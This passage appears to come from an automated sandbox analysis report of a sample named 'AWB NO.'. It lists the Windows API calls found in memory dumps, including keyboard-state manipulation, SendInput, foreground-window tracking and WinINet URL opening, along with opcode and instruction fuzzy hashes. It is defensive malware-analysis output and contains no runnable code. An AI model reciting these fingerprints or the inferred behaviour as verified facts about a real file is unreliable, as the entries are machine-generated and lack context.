                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00488B4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 0048AE1A
                                                              • GetWindowRect.USER32(?,?), ref: 0048AE90
                                                              • PtInRect.USER32(?,?,0048C304), ref: 0048AEA0
                                                              • MessageBeep.USER32(00000000), ref: 0048AF11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00461037
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00461053
                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 004610B9
                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0046110B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              APIs
                                                              • GetKeyboardState.USER32(?,75A7A2E0,?,00008000), ref: 00461176
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00461192
                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 004611F1
                                                              • SendInput.USER32(00000001,?,0000001C,75A7A2E0,?,00008000), ref: 00461243
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00485189
                                                                • Part of subcall function 0046387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00463897
                                                                • Part of subcall function 0046387D: GetCurrentThreadId.KERNEL32 ref: 0046389E
                                                                • Part of subcall function 0046387D: AttachThreadInput.USER32(00000000,?,004652A7), ref: 004638A5
                                                              • GetCaretPos.USER32(?), ref: 0048519A
                                                              • ClientToScreen.USER32(00000000,?), ref: 004851D5
                                                              • GetForegroundWindow.USER32 ref: 004851DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0045B6C7
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B6E4
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B71C
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B742
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                              • String ID:
                                                              • API String ID: 2796087071-0
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • GetCursorPos.USER32(?), ref: 0048C7C2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043BBFB,?,?,?,?,?), ref: 0048C7D7
                                                              • GetCursorPos.USER32(?), ref: 0048C824
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043BBFB,?,?,?), ref: 0048C85E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00471A97
                                                                • Part of subcall function 00471B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00471B40
                                                                • Part of subcall function 00471B21: InternetCloseHandle.WININET(00000000), ref: 00471BDD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                              • Instruction ID: 6bca59068395d17cc9b1d6ecd79d505e916fe66dc72e7fe7cd3c40e7ad3efc68
                                                              • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                              • Instruction Fuzzy Hash: 1521C235200600BFEB119F648C01FFBB7ADFF44700F10842FF90996660E775A815A798
                                                              APIs
                                                                • Part of subcall function 0045F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0045E1C4,?,?,?,0045EFB7,00000000,000000EF,00000119,?,?), ref: 0045F5BC
                                                                • Part of subcall function 0045F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0045F5E2
                                                                • Part of subcall function 0045F5AD: lstrcmpiW.KERNEL32(00000000,?,0045E1C4,?,?,?,0045EFB7,00000000,000000EF,00000119,?,?), ref: 0045F613
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0045EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0045E1DD
                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 0045E203
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0045EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0045E237
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: 20367ceda70578577b680d7018af8966699570bc105c6cdef83d59a45d3e2a0c
                                                              • Instruction ID: 22506efb5713b37d7609f33c51d8cac2a6d840cd6fd28f90ee3cef950c18954c
                                                              • Opcode Fuzzy Hash: 20367ceda70578577b680d7018af8966699570bc105c6cdef83d59a45d3e2a0c
                                                              • Instruction Fuzzy Hash: 6611E136200344EFCB28AF65D84997A37A8FF44310B40402BFC06CB265EB759959C7A8
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?,00000000,?,?), ref: 004319A8
                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,?,?,?,?), ref: 004319BC
                                                              • GetLastError.KERNEL32(?,?), ref: 004319C2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FilePointer$ErrorLast
                                                              • String ID:
                                                              • API String ID: 142388799-0
                                                              • Opcode ID: 96d28b628717fee27030172df11d7059e9dd06cf487130628a0c7d1f37902b0f
                                                              • Instruction ID: cf36be1d7aadb081738f1464b8d7a77c62de840a1f157368b3abbfab92ff2e8b
                                                              • Opcode Fuzzy Hash: 96d28b628717fee27030172df11d7059e9dd06cf487130628a0c7d1f37902b0f
                                                              • Instruction Fuzzy Hash: 53113D72611229BFDB119BA8DC40FBE3778AF45724F50025BF520671E1DB78D800C769
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00459043
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00459055
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0045906B
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00459086
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                              • Instruction ID: ea11c295a1b5830ac64b7cd386b9bd11a908e5797feff80cff23e6c095b925d2
                                                              • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                              • Instruction Fuzzy Hash: 84115E79900218FFDB10DFA5CC84E9EBBB4FB48710F2040A6EA04B7291D6716E55DB94
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                              • GetClientRect.USER32(?,?), ref: 0043B84B
                                                              • GetCursorPos.USER32(?), ref: 0043B855
                                                              • ScreenToClient.USER32(?,?), ref: 0043B860
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: e3d8f111a3b58b1aa3485ec631a693ca2f30f6b47763b5dceb9f2c7f206f7e47
                                                              • Instruction ID: 88478fa3ad29557ab13713681797212a94603c3b61ccda0d63648654153e7648
                                                              • Opcode Fuzzy Hash: e3d8f111a3b58b1aa3485ec631a693ca2f30f6b47763b5dceb9f2c7f206f7e47
                                                              • Instruction Fuzzy Hash: 82112B39510019EBCB00EF94D8859AE77B8FB05300F1048AAF901F7291D734AA569BA9
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00464D5C
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00464D8F
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464DA5
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464DAC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: 9a322c1cdd5e0a6c12338506eb066ae180f8c54d82c0008625fa69e03bdf94fe
                                                              • Instruction ID: 0819fc12fe5724ab96ebf4294b1419f29c00e38ef056b8eae01a1cb4f58a9b66
                                                              • Opcode Fuzzy Hash: 9a322c1cdd5e0a6c12338506eb066ae180f8c54d82c0008625fa69e03bdf94fe
                                                              • Instruction Fuzzy Hash: 0811E5B2904204BBCB11ABA8DC08ADF7BACEB85324F1442BAF915D3350E6798D4487A5
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004601FD,?,00461250,?,00008000), ref: 0046166F
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004601FD,?,00461250,?,00008000), ref: 00461694
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004601FD,?,00461250,?,00008000), ref: 0046169E
                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,004601FD,?,00461250,?,00008000), ref: 004616D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CounterPerformanceQuerySleep
                                                              • String ID:
                                                              • API String ID: 2875609808-0
                                                              • Opcode ID: 0b4158977cd20458f831617008364a677d5e8f004bfccfd560a8846e3b24cbac
                                                              • Instruction ID: 3f0d788a5ca093e10d78b07811411c4065f6d909a54a70e169c6da1dd9049ef0
                                                              • Opcode Fuzzy Hash: 0b4158977cd20458f831617008364a677d5e8f004bfccfd560a8846e3b24cbac
                                                              • Instruction Fuzzy Hash: E6115A35D0052DE7CF009FA5D948AEEBB78FF09701F08446BE940B2250DB3459608B9B
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0048B59E
                                                              • ScreenToClient.USER32(?,?), ref: 0048B5B6
                                                              • ScreenToClient.USER32(?,?), ref: 0048B5DA
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B5F5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
                                                              • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                              • Instruction ID: c1ec13a6a315efdf6b243f43d6614c5161e9ce39f19ad1524a172358c11b1c05
                                                              • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                              • Instruction Fuzzy Hash: 261146B5D00209EFDB41DF99C444AEEFBB5FF18310F104566E914E3620D735AA558F94
                                                              APIs
                                                                • Part of subcall function 004012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                • Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                • Part of subcall function 004012F3: BeginPath.GDI32(?), ref: 00401373
                                                                • Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040139C
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0048C030
                                                              • LineTo.GDI32(00000000,?,?), ref: 0048C03D
                                                              • EndPath.GDI32(00000000), ref: 0048C04D
                                                              • StrokePath.GDI32(00000000), ref: 0048C05B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                              • String ID:
                                                              • API String ID: 1539411459-0
                                                              • Opcode ID: edfbcd623de5c465fbf958c9dabb36f9443974b16c1799f8a50be9d4dd4f4236
                                                              • Instruction ID: 674b4468024ad211d301666b20e3bfa7de505a3549e2e29f62cfbf593809ea28
                                                              • Opcode Fuzzy Hash: edfbcd623de5c465fbf958c9dabb36f9443974b16c1799f8a50be9d4dd4f4236
                                                              • Instruction Fuzzy Hash: BAF0BE31001219BBDB127F90AC09FCE3F58AF06310F148429FA11210E287794564DBAD
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0045A399
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A3AC
                                                              • GetCurrentThreadId.KERNEL32 ref: 0045A3B3
                                                              • AttachThreadInput.USER32(00000000), ref: 0045A3BA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 2710830443-0
                                                              • Opcode ID: 59fde793fe6ed64e4cc0a9af18dd4c6470d45542e5beb6ebbb22759278acb506
                                                              • Instruction ID: ed216a13ff48d043802f8fe8c2a36ac0c7a485d78d52065609e6dcc2b31109e9
                                                              • Opcode Fuzzy Hash: 59fde793fe6ed64e4cc0a9af18dd4c6470d45542e5beb6ebbb22759278acb506
                                                              • Instruction Fuzzy Hash: 86E03931141228BBDB201BA2DC0CEDB3F1CEF167A2F008639F90894061D7798969DBA9
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00402231
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                              • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                              • GetStockObject.GDI32(00000005), ref: 00402258
                                                              • GetWindowDC.USER32(?,00000000), ref: 0043C0D3
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043C0E0
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0043C0F9
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0043C112
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0043C132
                                                              • ReleaseDC.USER32(?,00000000), ref: 0043C13D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: 27b2581c254cdff319ff0ea5d8f2be35128cc34943b3abbe395981e759962590
                                                              • Instruction ID: 007a7e945b926db1975f0eb4024d1954444be121fda63f18d3fd7a61cce91000
                                                              • Opcode Fuzzy Hash: 27b2581c254cdff319ff0ea5d8f2be35128cc34943b3abbe395981e759962590
                                                              • Instruction Fuzzy Hash: 58E03932100244EADB215FA8EC4D7DD3B20AB05332F10837AFAA9580E287764994DB15
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 00458C63
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0045882E), ref: 00458C6A
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0045882E), ref: 00458C77
